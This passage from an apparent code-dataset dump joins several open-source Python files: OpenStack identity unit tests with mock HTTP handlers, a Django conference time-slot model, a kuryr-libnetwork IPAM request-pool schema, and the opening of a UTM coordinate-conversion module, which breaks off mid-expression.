osa.authenticate(force=False)
self.assertEqual(mocked_auth_method.call_count, 1)
def _get_mock_connection(self, mock_http_class, auth_url=None):
OpenStackBaseConnection.conn_class = mock_http_class
if auth_url is None:
auth_url = "https://auth.api.example.com"
OpenStackBaseConnection.auth_url = auth_url
connection = OpenStackBaseConnection(*OPENSTACK_PARAMS)
connection._ex_force_base_url = "https://www.foo.com"
connection.driver = OpenStack_1_0_NodeDriver(*OPENSTACK_PARAMS)
return connection
class OpenStackIdentity_2_0_ConnectionTests(unittest.TestCase):
def setUp(self):
mock_cls = OpenStackIdentity_2_0_MockHttp
mock_cls.type = None
OpenStackIdentity_2_0_Connection.conn_class = mock_cls
self.auth_instance = OpenStackIdentity_2_0_Connection(auth_url='http://none',
user_id='test',
key='test',
tenant_name='test')
self.auth_instance.auth_token = 'mock'
def test_list_projects(self):
result = self.auth_instance.list_projects()
self.assertEqual(len(result), 2)
self.assertEqual(result[0].id, 'a')
self.assertEqual(result[0].name, 'test')
self.assertEqual(result[0].description, 'test project')
self.assertTrue(result[0].enabled)
class OpenStackIdentity_3_0_ConnectionTests(unittest.TestCase):
def setUp(self):
mock_cls = OpenStackIdentity_3_0_MockHttp
mock_cls.type = None
OpenStackIdentity_3_0_Connection.conn_class = mock_cls
self.auth_instance = OpenStackIdentity_3_0_Connection(auth_url='http://none',
user_id='test',
key='test',
tenant_name='test')
self.auth_instance.auth_token = 'mock'
def test_token_scope_argument(self):
# Invalid token_scope value
expected_msg = 'Invalid value for "token_scope" argument: foo'
self.assertRaisesRegexp(ValueError, expected_msg,
OpenStackIdentity_3_0_Connection,
auth_url='http://none',
user_id='test',
key='test',
token_scope='foo')
# Missing tenant_name
expected_msg = 'Must provide tenant_name and domain_name argument'
self.assertRaisesRegexp(ValueError, expected_msg,
OpenStackIdentity_3_0_Connection,
auth_url='http://none',
user_id='test',
key='test',
token_scope='project')
# Missing domain_name
expected_msg = 'Must provide domain_name argument'
self.assertRaisesRegexp(ValueError, expected_msg,
OpenStackIdentity_3_0_Connection,
auth_url='http://none',
user_id='test',
key='test',
token_scope='domain',
domain_name=None)
        # Scope to project, all OK
OpenStackIdentity_3_0_Connection(auth_url='http://none',
user_id='test',
key='test',
token_scope='project',
tenant_name='test',
domain_name='Default')
# Scope to domain
OpenStackIdentity_3_0_Connection(auth_url='http://none',
user_id='test',
key='test',
token_scope='domain',
tenant_name=None,
domain_name='Default')
def test_authenticate(self):
auth = OpenStackIdentity_3_0_Connection(auth_url='http://none',
user_id='test_user_id',
key='test_key',
token_scope='project',
tenant_name="test_tenant",
domain_name='test_domain')
auth.authenticate()
def test_list_supported_versions(self):
OpenStackIdentity_3_0_MockHttp.type = 'v3'
versions = self.auth_instance.list_supported_versions()
self.assertEqual(len(versions), 2)
self.assertEqual(versions[0].version, 'v2.0')
self.assertEqual(versions[0].url,
'http://192.168.18.100:5000/v2.0/')
self.assertEqual(versions[1].version, 'v3.0')
self.assertEqual(versions[1].url,
'http://192.168.18.100:5000/v3/')
def test_list_domains(self):
domains = self.auth_instance.list_domains()
self.assertEqual(len(domains), 1)
self.assertEqual(domains[0].id, 'default')
self.assertEqual(domains[0].name, 'Default')
self.assertTrue(domains[0].enabled)
def test_list_projects(self):
projects = self.auth_instance.list_projects()
self.assertEqual(len(projects), 4)
self.assertEqual(projects[0].id, 'a')
self.assertEqual(projects[0].domain_id, 'default')
self.assertTrue(projects[0].enabled)
self.assertEqual(projects[0].description, 'Test project')
def test_list_users(self):
users = self.auth_instance.list_users()
self.assertEqual(len(users), 12)
self.assertEqual(users[0].id, 'a')
self.assertEqual(users[0].domain_id, 'default')
self.assertEqual(users[0].enabled, True)
self.assertEqual(users[0].email, 'openstack-test@localhost')
def test_list_roles(self):
roles = self.auth_instance.list_roles()
self.assertEqual(len(roles), 2)
self.assertEqual(roles[1].id, 'b')
self.assertEqual(roles[1].name, 'admin')
def test_list_user_projects(self):
user = self.auth_instance.list_users()[0]
projects = self.auth_instance.list_user_projects(user=user)
self.assertEqual(len(projects), 0)
def test_list_user_domain_roles(self):
user = self.auth_instance.list_users()[0]
domain = self.auth_instance.list_domains()[0]
roles = self.auth_instance.list_user_domain_roles(domain=domain,
user=user)
self.assertEqual(len(roles), 1)
self.assertEqual(roles[0].name, 'admin')
def test_get_domain(self):
domain = self.auth_instance.get_domain(domain_id='default')
self.assertEqual(domain.name, 'Default')
def test_get_user(self):
user = self.auth_instance.get_user(user_id='a')
self.assertEqual(user.id, 'a')
self.assertEqual(user.domain_id, 'default')
self.assertEqual(user.enabled, True)
self.assertEqual(user.email, 'openstack-test@localhost')
def test_get_user_without_email(self):
user = self.auth_instance.get_user(user_id='b')
self.assertEqual(user.id, 'b')
self.assertEqual(user.name, 'userwithoutemail')
self.assertIsNone(user.email)
def test_get_user_without_enabled(self):
user = self.auth_instance.get_user(user_id='c')
self.assertEqual(user.id, 'c')
self.assertEqual(user.name, 'userwithoutenabled')
self.assertIsNone(user.enabled)
def test_create_user(self):
user = self.auth_instance.create_user(email='test2@localhost', password='test1',
name='test2', domain_id='default')
self.assertEqual(user.id, 'c')
self.assertEqual(user.name, 'test2')
def test_enable_user(self):
user = self.auth_instance.list_users()[0]
result = self.auth_instance.enable_user(user=user)
self.assertTrue(isinstance(result, OpenStackIdentityUser))
def test_disable_user(self):
user = self.auth_instance.list_users()[0]
result = self.auth_instance.disable_user(user=user)
self.assertTrue(isinstance(result, OpenStackIdentityUser))
def test_grant_domain_role_to_user(self):
domain = self.auth_instance.list_domains()[0]
role = self.auth_instance.list_roles()[0]
user = self.auth_instance.list_users()[0]
result = self.auth_instance.grant_domain_role_to_user(domain=domain,
role=role,
user=user)
self.assertTrue(result)
def test_revoke_domain_role_from_user(self):
domain = self.auth_instance.list_domains()[0]
role = self.auth_instance.list_roles()[0]
user = self.auth_instance.list_users()[0]
result = self.auth_instance.revoke_domain_role_from_user(domain=domain,
role=role,
user=user)
self.assertTrue(result)
def test_grant_project_role_to_user(self):
project = self.auth_instance.list_projects()[0]
role = self.auth_instance.list_roles()[0]
user = self.auth_instance.list_users()[0]
result = self.auth_instance.grant_project_role_to_user(project=project,
role=role,
user=user)
self.assertTrue(result)
def test_revoke_project_role_from_user(self):
project = self.auth_instance.list_projects()[0]
role = self.auth_instance.list_roles()[0]
user = self.auth_instance.list_users()[0]
result = self.auth_instance.revoke_project_role_from_user(project=project,
role=role,
user=user)
self.assertTrue(result)
class OpenStackIdentity_3_0_Connection_OIDC_access_token_federation_projectsTests(
unittest.TestCase):
def setUp(self):
mock_cls = OpenStackIdentity_3_0_federation_projects_MockHttp
mock_cls.type = None
OpenStackIdentity_3_0_Connection_OIDC_access_token.conn_class = mock_cls
self.auth_instance = OpenStackIdentity_3_0_Connection_OIDC_access_token(auth_url='http://none',
user_id='idp',
key='token',
tenant_name='oidc',
domain_name='test_domain')
self.auth_instance.auth_token = 'mock'
def test_authenticate(self):
auth = OpenStackIdentity_3_0_Connection_OIDC_access_token(auth_url='http://none',
user_id='idp',
key='token',
token_scope='project',
tenant_name="oidc",
domain_name='test_domain')
auth.authenticate()
class OpenStackIdentity_3_0_Connection_OIDC_access_tokenTests(
unittest.TestCase):
def setUp(self):
mock_cls = OpenStackIdentity_3_0_MockHttp
mock_cls.type = None
OpenStackIdentity_3_0_Connection_OIDC_access_token.conn_class = mock_cls
self.auth_instance = OpenStackIdentity_3_0_Connection_OIDC_access_token(auth_url='http://none',
user_id='idp',
key='token',
tenant_name='oidc',
domain_name='test_domain')
self.auth_instance.auth_token = 'mock'
def test_authenticate(self):
auth = OpenStackIdentity_3_0_Connection_OIDC_access_token(auth_url='http://none',
user_id='idp',
key='token',
token_scope='project',
tenant_name="oidc",
domain_name='test_domain')
auth.authenticate()
class OpenStackIdentity_2_0_Connection_VOMSTests(unittest.TestCase):
def setUp(self):
mock_cls = OpenStackIdentity_2_0_Connection_VOMSMockHttp
mock_cls.type = None
OpenStackIdentity_2_0_Connection_VOMS.conn_class = mock_cls
self.auth_instance = OpenStackIdentity_2_0_Connection_VOMS(auth_url='http://none',
user_id=None,
key='/tmp/proxy.pem',
tenant_name='VO')
self.auth_instance.auth_token = 'mock'
def test_authenticate(self):
auth = OpenStackIdentity_2_0_Connection_VOMS(auth_url='http://none',
user_id=None,
key='/tmp/proxy.pem',
token_scope='test',
tenant_name="VO")
auth.authenticate()
class OpenStackServiceCatalogTestCase(unittest.TestCase):
fixtures = ComputeFileFixtures('openstack')
def test_parsing_auth_v1_1(self):
data = self.fixtures.load('_v1_1__auth.json')
data = json.loads(data)
service_catalog = data['auth']['serviceCatalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='1.0')
entries = catalog.get_entries()
self.assertEqual(len(entries), 3)
entry = [e for e in entries if e.service_type == 'cloudFilesCDN'][0]
self.assertEqual(entry.service_type, 'cloudFilesCDN')
self.assertIsNone(entry.service_name)
self.assertEqual(len(entry.endpoints), 2)
self.assertEqual(entry.endpoints[0].region, 'ORD')
self.assertEqual(entry.endpoints[0].url,
'https://cdn2.clouddrive.com/v1/MossoCloudFS')
self.assertEqual(entry.endpoints[0].endpoint_type, 'external')
self.assertEqual(entry.endpoints[1].region, 'LON')
self.assertEqual(entry.endpoints[1].endpoint_type, 'external')
def test_parsing_auth_v2(self):
data = self.fixtures.load('_v2_0__auth.json')
data = json.loads(data)
service_catalog = data['access']['serviceCatalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='2.0')
entries = catalog.get_entries()
self.assertEqual(len(entries), 9)
entry = [e for e in entries if e.service_name == 'cloudServers'][0]
self.assertEqual(entry.service_type, 'compute')
self.assertEqual(entry.service_name, 'cloudServers')
self.assertEqual(len(entry.endpoints), 1)
self.assertIsNone(entry.endpoints[0].region)
self.assertEqual(entry.endpoints[0].url,
'https://servers.api.rackspacecloud.com/v1.0/1337')
self.assertEqual(entry.endpoints[0].endpoint_type, 'external')
def test_parsing_auth_v3(self):
data = self.fixtures.load('_v3__auth.json')
data = json.loads(data)
service_catalog = data['token']['catalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='3.x')
entries = catalog.get_entries()
self.assertEqual(len(entries), 6)
entry = [e for e in entries if e.service_type == 'volume'][0]
self.assertEqual(entry.service_type, 'volume')
self.assertIsNone(entry.service_name)
self.assertEqual(len(entry.endpoints), 3)
self.assertEqual(entry.endpoints[0].region, 'regionOne')
self.assertEqual(entry.endpoints[0].endpoint_type, 'external')
self.assertEqual(entry.endpoints[1].region, 'regionOne')
self.assertEqual(entry.endpoints[1].endpoint_type, 'admin')
self.assertEqual(entry.endpoints[2].region, 'regionOne')
self.assertEqual(entry.endpoints[2].endpoint_type, 'internal')
def test_get_public_urls(self):
data = self.fixtures.load('_v2_0__auth.json')
data = json.loads(data)
service_catalog = data['access']['serviceCatalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='2.0')
public_urls = catalog.get_public_urls(service_type='object-store')
expected_urls = ['https://storage101.lon1.clouddrive.com/v1/MossoCloudFS_11111-111111111-1111111111-1111111',
'https://storage101.ord1.clouddrive.com/v1/MossoCloudFS_11111-111111111-1111111111-1111111']
self.assertEqual(public_urls, expected_urls)
def test_get_regions(self):
data = self.fixtures.load('_v2_0__auth.json')
data = json.loads(data)
service_catalog = data['access']['serviceCatalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='2.0')
regions = catalog.get_regions(service_type='object-store')
self.assertEqual(regions, ['LON', 'ORD'])
regions = catalog.get_regions(service_type='invalid')
self.assertEqual(regions, [])
def test_get_service_types(self):
data = self.fixtures.load('_v2_0__auth.json')
data = json.loads(data)
service_catalog = data['access']['serviceCatalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='2.0')
service_types = catalog.get_service_types()
self.assertEqual(service_types, ['compute', 'image', 'network',
'object-store', 'rax:object-cdn',
'volumev2'])
service_types = catalog.get_service_types(region='ORD')
self.assertEqual(service_types, ['rax:object-cdn'])
def test_get_service_names(self):
data = self.fixtures.load('_v2_0__auth.json')
data = json.loads(data)
service_catalog = data['access']['serviceCatalog']
catalog = OpenStackServiceCatalog(service_catalog=service_catalog,
auth_version='2.0')
service_names = catalog.get_service_names()
self.assertEqual(service_names, ['cinderv2', 'cloudFiles',
'cloudFilesCDN', 'cloudServers',
'cloudServersOpenStack',
'cloudServersPreprod',
'glance',
'neutron',
'nova'])
service_names = catalog.get_service_names(service_type='compute')
self.assertEqual(service_names, ['cloudServers',
'cloudServersOpenStack',
'cloudServersPreprod',
'nova'])
class OpenStackIdentity_2_0_MockHttp(MockHttp):
fixtures = ComputeFileFixtures('openstack_identity/v2')
json_content_headers = {'content-type': 'application/json; charset=UTF-8'}
def _v2_0_tenants(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('v2_0_tenants.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
class OpenStackIdentity_3_0_MockHttp(MockHttp):
fixtures = ComputeFileFixtures('openstack_identity/v3')
json_content_headers = {'content-type': 'application/json; charset=UTF-8'}
def _v3(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('v3_versions.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_domains(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('v3_domains.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_projects(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('v3_projects.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_auth_tokens(self, method, url, body, headers):
if method == 'POST':
status = httplib.OK
data = json.loads(body)
if 'password' in data['auth']['identity']:
if data['auth']['identity']['password']['user']['domain']['name'] != 'test_domain' or \
data['auth']['scope']['project']['domain']['name'] != 'test_domain':
status = httplib.UNAUTHORIZED
body = ComputeFileFixtures('openstack').load('_v3__auth.json')
headers = self.json_content_headers.copy()
headers['x-subject-token'] = '00000000000000000000000000000000'
return (status, body, headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_users(self, method, url, body, headers):
if method == 'GET':
# list users
body = self.fixtures.load('v3_users.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
elif method == 'POST':
# create user
body = self.fixtures.load('v3_create_user.json')
return (httplib.CREATED, body, self.json_content_headers,
httplib.responses[httplib.CREATED])
raise NotImplementedError()
def _v3_users_a(self, method, url, body, headers):
if method == 'GET':
# look up a user
body = self.fixtures.load('v3_users_a.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
if method == 'PATCH':
# enable / disable user
body = self.fixtures.load('v3_users_a.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_users_b(self, method, url, body, headers):
if method == 'GET':
# look up a user
body = self.fixtures.load('v3_users_b.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_users_c(self, method, url, body, headers):
if method == 'GET':
# look up a user
body = self.fixtures.load('v3_users_c.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_roles(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('v3_roles.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_domains_default_users_a_roles_a(self, method, url, body, headers):
if method == 'PUT':
# grant domain role
body = ''
return (httplib.NO_CONTENT, body, self.json_content_headers,
httplib.responses[httplib.NO_CONTENT])
elif method == 'DELETE':
# revoke domain role
body = ''
return (httplib.NO_CONTENT, body, self.json_content_headers,
httplib.responses[httplib.NO_CONTENT])
raise NotImplementedError()
def _v3_projects_a_users_a_roles_a(self, method, url, body, headers):
if method == 'PUT':
# grant project role
body = ''
return (httplib.NO_CONTENT, body, self.json_content_headers,
httplib.responses[httplib.NO_CONTENT])
elif method == 'DELETE':
# revoke project role
body = ''
return (httplib.NO_CONTENT, body, self.json_content_headers,
httplib.responses[httplib.NO_CONTENT])
raise NotImplementedError()
def _v3_domains_default(self, method, url, body, headers):
if method == 'GET':
# get domain
body = self.fixtures.load('v3_domains_default.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_users_a_projects(self, method, url, body, headers):
if method == 'GET':
# get user projects
body = self.fixtures.load('v3_users_a_projects.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_domains_default_users_a_roles(self, method, url, body, headers):
if method == 'GET':
# get user domain roles
body = self.fixtures.load('v3_domains_default_users_a_roles.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_OS_FEDERATION_identity_providers_idp_protocols_oidc_auth(self, method, url, body, headers):
if method == 'GET':
headers = self.json_content_headers.copy()
headers['x-subject-token'] = '00000000000000000000000000000000'
return (httplib.OK, body, headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_OS_FEDERATION_projects(self, method, url, body, headers):
if method == 'GET':
# get user projects
body = json.dumps({"projects": [{"id": "project_id"}]})
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_auth_projects(self, method, url, body, headers):
if method == 'GET':
# get user projects
body = json.dumps({"projects": [{"id": "project_id"}]})
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
class OpenStackIdentity_3_0_federation_projects_MockHttp(OpenStackIdentity_3_0_MockHttp):
fixtures = ComputeFileFixtures('openstack_identity/v3')
json_content_headers = {'content-type': 'application/json; charset=UTF-8'}
def _v3_OS_FEDERATION_projects(self, method, url, body, headers):
if method == 'GET':
# get user projects
body = json.dumps({"projects": [{"id": "project_id"}]})
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_auth_projects(self, method, url, body, headers):
return (httplib.INTERNAL_SERVER_ERROR, body, self.json_content_headers,
httplib.responses[httplib.INTERNAL_SERVER_ERROR])
class OpenStackIdentity_2_0_Connection_VOMSMockHttp(MockHttp):
fixtures = ComputeFileFixtures('openstack_identity/v2')
json_content_headers = {'content-type': 'application/json; charset=UTF-8'}
def _v2_0_tokens(self, method, url, body, headers):
if method == 'POST':
status = httplib.UNAUTHORIZED
data = json.loads(body)
if 'voms' in data['auth'] and data['auth']['voms'] is True:
status = httplib.OK
body = ComputeFileFixtures('openstack').load('_v2_0__auth.json')
headers = self.json_content_headers.copy()
headers['x-subject-token'] = '00000000000000000000000000000000'
return (status, body, headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v2_0_tenants(self, method, url, body, headers):
if method == 'GET':
# get user projects
body = json.dumps({"tenant": [{"name": "tenant_name"}]})
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
if __name__ == '__main__':
sys.exit(unittest.main())
| apache-2.0 | -8,319,677,392,506,798,000 | 43.310059 | 117 | 0.558464 | false |
djangocon/2017.djangocon.eu | conference/schedule/models.py | 1 | 5351 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import datetime as dt
from autoslug import AutoSlugField
from autoslug.utils import slugify
from django.core.exceptions import ValidationError
from django.db import models
from django.template.defaultfilters import truncatechars_html
from django.utils.translation import gettext_lazy as _
from filer.fields.image import FilerImageField
from filer.models import ThumbnailOption
from meta.models import ModelMeta
from conference.cfp.models import Submission, WorkshopSubmission
class Slot(ModelMeta, models.Model):
"""
    Model for conference time slots. It can be for a talk, a workshop, or a custom time slot (e.g. a coffee break).
"""
talk = models.ForeignKey(
Submission, related_name='talks', limit_choices_to={'selected': True}, null=True, blank=True
)
slug = AutoSlugField(
_('Slug'), max_length=400, blank=True, populate_from='generated_slug', always_update=True
)
workshop = models.ForeignKey(
WorkshopSubmission, related_name='workshops', limit_choices_to={'selected': True}, null=True, blank=True
)
name = models.CharField(
_('Name'), max_length=250, null=True, blank=True,
help_text=_('Field for time slots that does not relate to a Talk or a Workshop.')
)
    mugshot = FilerImageField(verbose_name=_('Speaker mugshot'), null=True, blank=True)
twitter = models.CharField(_('Twitter'), max_length=200, default='', blank=True)
schedule_abstract = models.TextField(_('Schedule abstract'), blank=True, null=True)
day = models.DateField(_('Date'))
start = models.TimeField(_('Start'))
duration = models.DurationField(_('Duration'))
sprint_days = models.BooleanField(_('Part of sprint days'), default=False)
show_end_time = models.BooleanField(_('Show end time in schedule'), default=False)
slides = models.URLField(_('Speaker slides'), blank=True, null=True)
video = models.URLField(_('Talk video'), blank=True, null=True)
_metadata = {
'title': 'title',
'description': 'get_meta_abstract',
'image': 'get_image',
}
class Meta:
verbose_name = _('Time slot')
verbose_name_plural = _('Time slots')
ordering = ('day', 'start')
def clean(self):
# ensure talk and workshop are NOT filled at the same time
if self.talk and self.workshop:
message = _('Please, select either a Talk or a Workshop, not both.')
raise ValidationError({
'talk': ValidationError(message=message, code='invalid'),
'workshop': ValidationError(message=message, code='invalid'),
})
def get_image(self):
if self.mugshot:
return self.mugshot.url
else:
return None
def get_meta_abstract(self):
return truncatechars_html(self.abstract, 180)
@property
def title(self):
if self.talk_id:
return self.talk.proposal_title
elif self.workshop_id:
return self.workshop.proposal_title
elif self.name:
return self.name
return ''
@property
def author(self):
if self.talk:
return self.talk.author
elif self.workshop:
return self.workshop.author
return ''
@property
def generated_slug(self):
return slugify(self.title)
@property
def twitter_split(self):
if self.twitter:
return self.twitter.split(',')
return ''
@property
def abstract(self):
if self.schedule_abstract:
return self.schedule_abstract
if self.talk:
return self.talk.proposal_abstract
elif self.workshop:
return self.workshop.proposal_abstract
return ''
@property
def bio(self):
if self.is_talk() and self.talk.author_bio and len(self.talk.author_bio) > 3:
return self.talk.author_bio
if self.is_workshop() and self.workshop.author_bio and len(self.workshop.author_bio) > 3:
return self.workshop.author_bio
return ''
@property
def parsed_duration(self):
minutes = self.duration.seconds//60
hours = minutes//60
if hours:
minutes -= hours * 60
if minutes:
return '{}h {}min'.format(hours, minutes)
return '{}h'.format(hours)
return '{}min'.format(minutes)
@property
def end_time(self):
combined = dt.datetime.combine(dt.date.today(), self.start)
end_time = combined + self.duration
return end_time.time()
@property
def height(self):
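        # Assumed rendering rule: the schedule template draws 6 units of height
        # per 100 seconds of duration (assumption; not stated in the model).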
return self.duration.total_seconds() / 100 * 6
@property
def thumbnail_option(self):
return ThumbnailOption.objects.get(name__icontains='speaker').as_dict
def is_talk(self):
return True if self.talk else False
is_talk.short_description = _('Talk')
is_talk.boolean = True
def is_workshop(self):
return True if self.workshop else False
is_workshop.short_description = _('Workshop')
is_workshop.boolean = True
def is_custom(self):
return True if self.name else False
is_custom.short_description = _('Custom')
is_custom.boolean = True
| bsd-3-clause | -7,714,352,984,290,550,000 | 32.44375 | 113 | 0.63091 | false |
celebdor/kuryr-libnetwork | kuryr_libnetwork/schemata/request_pool.py | 1 | 2102 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from kuryr_libnetwork.schemata import commons
REQUEST_POOL_SCHEMA = {
u'links': [{
u'method': u'POST',
u'href': u'/IpamDriver.RequestPool',
u'description': u'Allocate pool of ip addresses',
u'rel': u'self',
u'title': u'Create'
}],
u'title': u'Create pool',
u'required': [u'AddressSpace', u'Pool', u'SubPool', u'V6'],
u'definitions': {u'commons': {}},
u'$schema': u'http://json-schema.org/draft-04/hyper-schema',
u'type': u'object',
u'properties': {
u'AddressSpace': {
u'description': u'The name of the address space.',
u'type': u'string',
u'example': u'foo',
},
u'Pool': {
u'description': u'A range of IP Addresses represented in '
u'CIDR format address/mask.',
u'$ref': u'#/definitions/commons/definitions/cidr'
},
u'SubPool': {
            u'description': u'A subset of IP range from Pool in '
u'CIDR format address/mask.',
u'$ref': u'#/definitions/commons/definitions/cidr'
},
u'Options': {
u'type': [u'object', u'null'],
u'description': u'Options',
u'example': {},
},
u'V6': {
            u'description': u'If set to True, an IPv6 pool is requested; '
                            u'otherwise an IPv4 pool.',
u'type': u'boolean',
u'example': False
}
}
}
REQUEST_POOL_SCHEMA[u'definitions'][u'commons'] = commons.COMMONS
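# Illustrative request body this schema is intended to validate (values are
# hypothetical): {"AddressSpace": "foo", "Pool": "10.0.0.0/16",
# "SubPool": "10.0.1.0/24", "V6": False, "Options": {}}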
| apache-2.0 | -7,775,517,763,167,128,000 | 35.241379 | 75 | 0.569933 | false |
alexanderfefelov/nav | python/nav/web/geomap/coordinates.py | 1 | 10124 | #
# Copyright (C) 2009, 2010 UNINETT AS
#
# This file is part of Network Administration Visualized (NAV).
#
# NAV is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License version 2 as published by the Free
# Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details. You should have received a copy of the GNU General Public
# License along with NAV. If not, see <http://www.gnu.org/licenses/>.
#
"""Coordinate transformation.
Functions for converting between UTM and longitude/latitude, and for
parsing a string representation of UTM.
Derived from code available under GPL from http://pygps.org/
(http://pygps.org/LatLongUTMconversion-1.2.tar.gz)
"""
from math import pi, sin, cos, tan, sqrt
import re
_deg2rad = pi / 180.0
_rad2deg = 180.0 / pi
_equatorial_radius = 2
_eccentricity_squared = 3
_ellipsoid = [
# id, Ellipsoid name, Equatorial Radius, square of eccentricity
    # first one is a placeholder only, to allow array indices to match id numbers
[ -1, "Placeholder", 0, 0],
[ 1, "Airy", 6377563, 0.00667054],
[ 2, "Australian National", 6378160, 0.006694542],
[ 3, "Bessel 1841", 6377397, 0.006674372],
[ 4, "Bessel 1841 (Nambia] ", 6377484, 0.006674372],
[ 5, "Clarke 1866", 6378206, 0.006768658],
[ 6, "Clarke 1880", 6378249, 0.006803511],
[ 7, "Everest", 6377276, 0.006637847],
[ 8, "Fischer 1960 (Mercury] ", 6378166, 0.006693422],
[ 9, "Fischer 1968", 6378150, 0.006693422],
[ 10, "GRS 1967", 6378160, 0.006694605],
[ 11, "GRS 1980", 6378137, 0.00669438],
[ 12, "Helmert 1906", 6378200, 0.006693422],
[ 13, "Hough", 6378270, 0.00672267],
[ 14, "International", 6378388, 0.00672267],
[ 15, "Krassovsky", 6378245, 0.006693422],
[ 16, "Modified Airy", 6377340, 0.00667054],
[ 17, "Modified Everest", 6377304, 0.006637847],
[ 18, "Modified Fischer 1960", 6378155, 0.006693422],
[ 19, "South American 1969", 6378160, 0.006694542],
[ 20, "WGS 60", 6378165, 0.006693422],
[ 21, "WGS 66", 6378145, 0.006694542],
[ 22, "WGS-72", 6378135, 0.006694318],
[ 23, "WGS-84", 6378137, 0.00669438]
]
#Reference ellipsoids derived from Peter H. Dana's website-
#http://www.utexas.edu/depts/grg/gcraft/notes/datum/elist.html
#Department of Geography, University of Texas at Austin
#Internet: pdana@mail.utexas.edu
#3/22/95
#Source
#Defense Mapping Agency. 1987b. DMA Technical Report: Supplement to Department of Defense World Geodetic System
#1984 Technical Report. Part I and II. Washington, DC: Defense Mapping Agency
def ll_to_utm(reference_ellipsoid, lat, lon, zone = None):
"""converts lat/long to UTM coords. Equations from USGS Bulletin 1532
East Longitudes are positive, West longitudes are negative.
North latitudes are positive, South latitudes are negative
lat and Long are in decimal degrees
Written by Chuck Gantz- chuck.gantz@globalstar.com"""
a = _ellipsoid[reference_ellipsoid][_equatorial_radius]
ecc_squared = _ellipsoid[reference_ellipsoid][_eccentricity_squared]
k0 = 0.9996
#Make sure the longitude is between -180.00 .. 179.9
lon_tmp = (lon+180)-int((lon+180)/360)*360-180 # -180.00 .. 179.9
lat_rad = lat*_deg2rad
lon_rad = lon_tmp*_deg2rad
if zone is None:
zone_number = int((lon_tmp + 180)/6) + 1
else:
zone_number = zone
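    # Zone exception: south-western Norway (56N-64N, 3E-12E) belongs to zone 32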
if lat >= 56.0 and lat < 64.0 and lon_tmp >= 3.0 and lon_tmp < 12.0:
zone_number = 32
# Special zones for Svalbard
if lat >= 72.0 and lat < 84.0:
if lon_tmp >= 0.0 and lon_tmp < 9.0:
zone_number = 31
elif lon_tmp >= 9.0 and lon_tmp < 21.0:
zone_number = 33
elif lon_tmp >= 21.0 and lon_tmp < 33.0:
zone_number = 35
elif lon_tmp >= 33.0 and lon_tmp < 42.0:
zone_number = 37
lon_origin = (zone_number - 1)*6 - 180 + 3 #+3 puts origin in middle of zone
lon_origin_rad = lon_origin * _deg2rad
#compute the UTM Zone from the latitude and longitude
utm_zone = "%d%c" % (zone_number, _utm_letter_designator(lat))
ecc_prime_squared = (ecc_squared)/(1-ecc_squared)
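    # Transverse Mercator series terms (USGS Bulletin 1532): N is the radius of
    # curvature in the prime vertical, M the meridional arc from the equator.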
N = a/sqrt(1-ecc_squared*sin(lat_rad)*sin(lat_rad))
T = tan(lat_rad)*tan(lat_rad)
C = ecc_prime_squared*cos(lat_rad)*cos(lat_rad)
A = cos(lat_rad)*(lon_rad-lon_origin_rad)
M = a*((1
- ecc_squared/4
- 3*ecc_squared*ecc_squared/64
- 5*ecc_squared*ecc_squared*ecc_squared/256)*lat_rad
- (3*ecc_squared/8
+ 3*ecc_squared*ecc_squared/32
+ 45*ecc_squared*ecc_squared*ecc_squared/1024)*sin(2*lat_rad)
